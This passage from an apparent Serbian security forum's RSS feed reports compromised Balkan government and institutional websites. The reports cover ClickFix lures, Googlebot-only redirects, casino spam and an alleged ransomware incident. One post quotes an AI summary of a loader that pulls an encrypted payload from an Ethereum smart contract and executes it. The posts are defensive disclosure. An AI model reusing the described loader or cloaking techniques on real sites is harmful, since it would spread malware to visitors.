<!-- end: postbit_attachments_attachment --><br />
<br />
I dalje od ovoga ne ide jer pretpostavljam da ne dobija ključ za dekripciju, a mislim da ga potražuje sa ovog sledećeg domena jer se i ovo učitava sa zelenilo sajta i domen je sveže registrovan. Samo vrati 200 OK i ništa drugo :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7789" target="_blank">zel3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">108.23 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">174</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
To je sve što mogu za sada da analiziram, definitivno je sajt kompromitovan i najverovatnije je ClickFix u pitanju, ima sve odlike sličnih kompromitacija.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>zelenilo.com has address 212.200.255.58</code></div></div>]]></description>
			<content:encoded><![CDATA[Ne uspevam da detoniram clickfix, izgleda da je neki deo infrastrukture nedostupan.<br />
<br />
Na sajtu na vrhu kôda postoji zamagljeni kôd :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7791" target="_blank">zel1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">420.52 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">171</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
DeepSeek ga opisuje kao:<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>2. <span style="font-weight: bold;" class="mycode_b">Core Functionality</span><br />
The decoded script performs these actions:<br />
A. <span style="font-weight: bold;" class="mycode_b">Environment Checks</span><ul class="mycode_list"><li>Checks if running on Windows platform<br />
</li>
<li>Verifies browser/user-agent<br />
</li>
<li>Looks for debugging tools<br />
</li>
</ul>
B. <span style="font-weight: bold;" class="mycode_b">Smart Contract Interaction</span><ul class="mycode_list"><li>Connects to multiple Ethereum RPC endpoints:<ul class="mycode_list"><li><a href="https://rpc.sepolia.ethpandaops.io" target="_blank" rel="noopener" class="mycode_url">https://rpc.sepolia.ethpandaops.io</a><br />
</li>
<li><a href="https://ethereum-sepolia-public.nodes.app" target="_blank" rel="noopener" class="mycode_url">https://ethereum-sepolia-public.nodes.app</a><br />
</li>
<li><a href="https://1rpc.io/sepolia" target="_blank" rel="noopener" class="mycode_url">https://1rpc.io/sepolia</a><br />
</li>
<li><a href="https://gateway.tenderly.co/public/sepolia" target="_blank" rel="noopener" class="mycode_url">https://gateway.tenderly.co/public/sepolia</a><br />
</li>
<li><a href="https://sepolia.gateway.tenderly.co" target="_blank" rel="noopener" class="mycode_url">https://sepolia.gateway.tenderly.co</a><br />
</li>
</ul>
</li>
</ul>
C. <span style="font-weight: bold;" class="mycode_b">Payload Retrieval</span><ul class="mycode_list"><li>Calls a smart contract at address <br />
0x0321C73150543FAa9D016c9c46Abf293Eb6839e4<br />
</li>
<li>Uses <br />
eth_call<br />
to fetch data<br />
</li>
<li>Decrypts the response using AES-GCM<br />
</li>
</ul>
D. <span style="font-weight: bold;" class="mycode_b">Payload Execution</span><ul class="mycode_list"><li>Decrypts the retrieved data<br />
</li>
<li>Stores it in <br />
localStorage<br />
with a cache key<br />
</li>
<li>Executes the decrypted code via <br />
new Function()<br />
</li>
</ul>
</blockquote>
<br />
I zaista učitava sa blokčejna odakle dobija enkriptovan tekst :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7790" target="_blank">zel2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">351.64 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">166</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
I dalje od ovoga ne ide jer pretpostavljam da ne dobija ključ za dekripciju, a mislim da ga potražuje sa ovog sledećeg domena jer se i ovo učitava sa zelenilo sajta i domen je sveže registrovan. Samo vrati 200 OK i ništa drugo :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7789" target="_blank">zel3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">108.23 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">174</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
To je sve što mogu za sada da analiziram, definitivno je sajt kompromitovan i najverovatnije je ClickFix u pitanju, ima sve odlike sličnih kompromitacija.<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>zelenilo.com has address 212.200.255.58</code></div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Sajt Filolozofskog fakulteta u Nišu - filfak.ni.ac.rs - preusmeravanje i kazino spam]]></title>
			<link>https://bezbedanbalkan.net/thread-2725.html</link>
			<pubDate>Wed, 09 Sep 2026 08:47:21 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2725.html</guid>
			<description><![CDATA[Sajt Filozofskog fakulteta u Nišu ima nekih problema :<br />
<br />
Na glavnoj stranici glavnog sajta <a href="https://www.filfak.ni.ac.rs" target="_blank" rel="noopener" class="mycode_url">https://www.filfak.ni.ac.rs</a> ako se pristupi kao gugl bot dobije se preusmeravanja na sajt "<span style="font-weight: bold;" class="mycode_b">Dream of the Red Chamber Interdisciplinary Research Center, National Dong Hwa University" </span>sa Tajvana, skraćeno se zove "NDHU"...<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7776" target="_blank">filf1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">225.64 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">148</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7775" target="_blank">filf3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">1.12 MB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">149</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Usled ovoga gugl indeksira glavnu stranicu fakulteta kao stranicu tajvanskog univerziteta i tako je prikazuje u rezultatima :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7777" target="_blank">filf2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">44.34 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">152</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Takođe na drugim stranicama je u nekom trenutku postojala kompromitacija koja je indeksirala neke stranice sa naslovom ovog tajvanskog univerziteta odnosno "NDHU" :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7778" target="_blank">filf4.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">67.54 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">144</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Nisam našao da je ova kompromitacija još uvek aktivna pa je pitanje da samo gugl reindeksira stranice da bi se sporan naslov sklonio.<br />
<br />
Sajt koristi Joomla CMS koji je dosta bušan naročito ako se aktivno ne ažurira kako glavna instalacija tako i dodaci, potrebno je počistiti sve i ažurirati sve jer ako se samo počisti opet će se pojaviti.<br />
<br />
<hr class="mycode_hr" />
<br />
Sa druge strane sajt <a href="https://studenti.filfak.ni.ac.rs" target="_blank" rel="noopener" class="mycode_url">https://studenti.filfak.ni.ac.rs</a> takođe ima probleme, reklamira indonežanski kazino takođe ako mu se pristupi kao gugl bot zato je tako i indeksirano na guglu :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7779" target="_blank">filfstu0.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">31.99 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">145</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7780" target="_blank">filfstu2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">747.07 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">153</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
I ovaj sajt izgleda koristi Joomla te je moguće da su oba kompromitovana na sličan način preko nekog Plug-ina ili ranjivosti na samoj Joomla instalaciji.]]></description>
			<content:encoded><![CDATA[Sajt Filozofskog fakulteta u Nišu ima nekih problema :<br />
<br />
Na glavnoj stranici glavnog sajta <a href="https://www.filfak.ni.ac.rs" target="_blank" rel="noopener" class="mycode_url">https://www.filfak.ni.ac.rs</a> ako se pristupi kao gugl bot dobije se preusmeravanja na sajt "<span style="font-weight: bold;" class="mycode_b">Dream of the Red Chamber Interdisciplinary Research Center, National Dong Hwa University" </span>sa Tajvana, skraćeno se zove "NDHU"...<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7776" target="_blank">filf1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">225.64 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">148</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7775" target="_blank">filf3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">1.12 MB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">149</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Usled ovoga gugl indeksira glavnu stranicu fakulteta kao stranicu tajvanskog univerziteta i tako je prikazuje u rezultatima :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7777" target="_blank">filf2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">44.34 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">152</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Takođe na drugim stranicama je u nekom trenutku postojala kompromitacija koja je indeksirala neke stranice sa naslovom ovog tajvanskog univerziteta odnosno "NDHU" :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7778" target="_blank">filf4.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">67.54 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">144</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Nisam našao da je ova kompromitacija još uvek aktivna pa je pitanje da samo gugl reindeksira stranice da bi se sporan naslov sklonio.<br />
<br />
Sajt koristi Joomla CMS koji je dosta bušan naročito ako se aktivno ne ažurira kako glavna instalacija tako i dodaci, potrebno je počistiti sve i ažurirati sve jer ako se samo počisti opet će se pojaviti.<br />
<br />
<hr class="mycode_hr" />
<br />
Sa druge strane sajt <a href="https://studenti.filfak.ni.ac.rs" target="_blank" rel="noopener" class="mycode_url">https://studenti.filfak.ni.ac.rs</a> takođe ima probleme, reklamira indonežanski kazino takođe ako mu se pristupi kao gugl bot zato je tako i indeksirano na guglu :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7779" target="_blank">filfstu0.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">31.99 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">145</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7780" target="_blank">filfstu2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">747.07 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">153</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
I ovaj sajt izgleda koristi Joomla te je moguće da su oba kompromitovana na sličan način preko nekog Plug-ina ili ranjivosti na samoj Joomla instalaciji.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Spam + clickfix na sajtu - gcsrbg.org - Gradski centar za socijalni rad u Beogradu]]></title>
			<link>https://bezbedanbalkan.net/thread-2723.html</link>
			<pubDate>Tue, 08 Sep 2026 20:58:14 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2723.html</guid>
			<description><![CDATA[U nekom trenutku oko 22.08.2026 stranica ovog državnog sajta je bila kompromitovana i prikazivala je nekakve oglase kao na slici dole.<br />
<br />
Problem je u nekom trenutku rešen i sajt je sada u ispravnom stanju.<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="JPG Image" alt=".jpg" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7769" target="_blank">gcsrbg1.jpg</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">187.45 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">137</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Sajt je takođe navodno pokušavao da pokrene clickfix prevaru :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="JPG Image" alt=".jpg" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7770" target="_blank">gcsrbg2.jpg</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">34.86 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">129</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7771" target="_blank">gc3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">63.61 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">135</span></span>
</div>
<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[U nekom trenutku oko 22.08.2026 stranica ovog državnog sajta je bila kompromitovana i prikazivala je nekakve oglase kao na slici dole.<br />
<br />
Problem je u nekom trenutku rešen i sajt je sada u ispravnom stanju.<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="JPG Image" alt=".jpg" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7769" target="_blank">gcsrbg1.jpg</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">187.45 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">137</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Sajt je takođe navodno pokušavao da pokrene clickfix prevaru :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="JPG Image" alt=".jpg" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7770" target="_blank">gcsrbg2.jpg</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">34.86 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">129</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7771" target="_blank">gc3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">63.61 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">135</span></span>
</div>
<!-- end: postbit_attachments_attachment -->]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[kompromitovan ravnopravnost.gov.rs - indonežanski kazino spam]]></title>
			<link>https://bezbedanbalkan.net/thread-2717.html</link>
			<pubDate>Sun, 06 Sep 2026 15:56:34 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=40">milos_rs</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2717.html</guid>
			<description><![CDATA[Na sajtu pod raznim adresama koje su pod /wp-content/uploads javljaju se indonežanske reklame za kazino spam :<br />
<br />
primer adresa:<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>https://ravnopravnost.gov.rs/wp-content/uploads/sbobet88-togel-login/
https://ravnopravnost.gov.rs/wp-content/uploads/arena188/
https://ravnopravnost.gov.rs/wp-content/uploads/paitosydney/</code></div></div><br />
Nije mi poznato da li ovi podfolderi zaista postoje ili neka kompromitovani WordPress plugin tako predstavlja. Ali slike jesu zvanične slike na samom sajtu koje se ovde zloupotrebljavaju.<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7754" target="_blank">rav1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">322.57 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">153</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7753" target="_blank">rav2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">262.3 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">141</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7752" target="_blank">rav3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">257.77 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">140</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Prema guglu moguće je da ima oko 1000 ovakvih stranica mada ih ne indeksira ispravno :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7755" target="_blank">rav0.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">199.41 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">144</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Sajt je na državnim web serverima pod nadležnosti Kancelarije za informacione tehnologije i elektronsku upravu<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>ravnopravnost.gov.rs has address 195.222.98.253</code></div></div>]]></description>
			<content:encoded><![CDATA[Na sajtu pod raznim adresama koje su pod /wp-content/uploads javljaju se indonežanske reklame za kazino spam :<br />
<br />
primer adresa:<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>https://ravnopravnost.gov.rs/wp-content/uploads/sbobet88-togel-login/
https://ravnopravnost.gov.rs/wp-content/uploads/arena188/
https://ravnopravnost.gov.rs/wp-content/uploads/paitosydney/</code></div></div><br />
Nije mi poznato da li ovi podfolderi zaista postoje ili neka kompromitovani WordPress plugin tako predstavlja. Ali slike jesu zvanične slike na samom sajtu koje se ovde zloupotrebljavaju.<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7754" target="_blank">rav1.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">322.57 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">153</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7753" target="_blank">rav2.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">262.3 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">141</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7752" target="_blank">rav3.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">257.77 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">140</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Prema guglu moguće je da ima oko 1000 ovakvih stranica mada ih ne indeksira ispravno :<br />
<br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7755" target="_blank">rav0.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">199.41 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">144</span></span>
</div>
<!-- end: postbit_attachments_attachment --><br />
<br />
Sajt je na državnim web serverima pod nadležnosti Kancelarije za informacione tehnologije i elektronsku upravu<br />
<br />
<div class="codeblock"><div class="title">Code:</div><div class="body" dir="ltr"><code>ravnopravnost.gov.rs has address 195.222.98.253</code></div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Navodno kompromitovan ipardpa.gov.mk - Ransomware]]></title>
			<link>https://bezbedanbalkan.net/thread-2716.html</link>
			<pubDate>Sat, 05 Sep 2026 10:46:53 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://bezbedanbalkan.net/member.php?action=profile&uid=110">VincaSec</a>]]></dc:creator>
			<guid isPermaLink="false">https://bezbedanbalkan.net/thread-2716.html</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Dana 11. juna 2007. godine, Sobranje Republike Makedonije usvojilo je Zakon o osnivanju Agencije za finansijsku podršku u poljoprivredi i ruralnom razvoju, s ciljem uspešnije realizacije mera poljoprivredne politike i politike ruralnog razvoja u Republici Makedoniji. Time se omogućava efikasno upravljanje finansijskim sredstvima kako iz Budžeta Republike Makedonije, tako i sredstvima iz pretpristupne pomoći Evropske unije namenjenim za ruralni razvoj. </blockquote>
<a href="https://www.ipardpa.gov.mk/" target="_blank" rel="noopener" class="mycode_url">https://www.ipardpa.gov.mk/</a><br />
<br />
Trenutno nema uzorak vezano za ovu navodnu kompromitaciju. <br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
<a  class="vmiddle inline-block" href="attachment.php?aid=7751" target="_blank">mk.png</a> <span class="smalltext float_right">Size: <span class="inline-block vmiddle">223.91 KB</span>&nbsp;&nbsp;Downloads: <span class="inline-block vmiddle">147</span></span>
</div>
<!-- end: postbit_attachments_attachment -->]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Dana 11. juna 2007. godine, Sobranje Republike Makedonije usvojilo je Zakon o osnivanju Agencije za finansijsku podršku u poljoprivredi i ruralnom razvoju, s ciljem uspešnije realizacije mera poljoprivredne politike i politike ruralnog razvoja u Republici Makedoniji. Time se omogućava efikasno upravljanje finansijskim sredstvima kako iz Budžeta Republike Makedonije, tako i sredstvima iz pretpristupne pomoći Evropske unije namenjenim za ruralni razvoj. </blockquote>
<a href="https://www.ipardpa.gov.mk/" target="_blank" rel="noopener" class="mycode_url">https://www.ipardpa.gov.mk/</a><br />
<br />
Trenutno nema uzorak vezano za ovu navodnu kompromitaciju. <br />
<!-- start: postbit_attachments_attachment -->
<div style="padding:4px 0px;"><span class="inline-block vmiddle"><!-- start: attachment_icon -->
<img src="https://bezbedanbalkan.net/images/attachtypes/image.png" title="PNG Image" alt=".png" />
<!-- end: attachment_icon --></span>
